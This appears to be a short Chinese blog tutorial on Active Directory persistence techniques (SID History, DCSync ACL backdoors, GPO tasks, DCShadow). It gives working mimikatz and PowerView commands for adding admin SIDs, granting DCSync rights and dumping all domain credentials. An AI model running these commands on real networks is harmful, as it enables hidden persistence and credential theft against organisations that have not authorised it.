域内环境中常用的维持权限的方式.
金银票据
SID History
SID History 为域内用户迁移到新域时针对用户权限的转移而提供的一种手段.
通过 SID History 可让用户拥有不同身份的权限, 在单域中同样有效.
mimikatz "privilege::debug" "sid::patch" "sid::add /new:admin-sid /sam:test" "exit"
注意要先进行 sid::patch, 否则会出现 ERROR kuhl_m_sid_add;ldap_modify_s 0x32 (50) 错误.
清除 SID History.
mimikatz "privilege::debug" "sid::patch" "sid::clear /sam:test" "exit"
ACL 后门
ACL 全称 Access Control List, 即访问控制列表. 故 ACL 后门, 是指针对权限配置缺陷的后门.
DCSync
ACL 后门的 DCSync 形式.
使用 PowerSploit Dev 分支中的 PowerView.
Add-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity test -Rights DCSync
这样在任意一台主机上以 test 用户登录都能通过 DCSync 向域控请求账户凭据.
mimikatz "lsadump::dcsync /all" "exit"
删除 DCSync 后门.
Remove-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity test -Rights DCSync
GPO
ACL 后门的 GPO 形式.
通过在组策略管理中添加计划任务批量设置后门.
暂且只给出利用工具, 尚未测试成功.
3gstudent/New-GPOImmediateTask.
DCShadow
通过伪造 DC 并与正常 DC 同步数据的方式修改账户信息. 需要本地系统及域管理员权限.
无需登录 DC, 且只会留下 Directory Service Access 日志, 缺点是可执行的操作较少.
需要将 mimikatz 提升为 system 权限, 通过 mimidrv.sys 实现.
!+
!processtoken
修改管理员组.
lsadump::dcshadow /object:CN=test,CN=Users,DC=test,DC=com /attribute:primarygroupid /value:512
添加 SID History.
lsadump::dcshadow /object:CN=test,CN=Users,DC=test,DC=com /attribute:sidhistory /value:admin-sid
最后以域管理员权限启动另一个 mimikatz 进程.
lsadump::dcshadow /push
通过 DCShadow 还能够修改其它信息, 具体请在"属性编辑器"里查询.
- By:X1r0z[exp10it.cn]
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论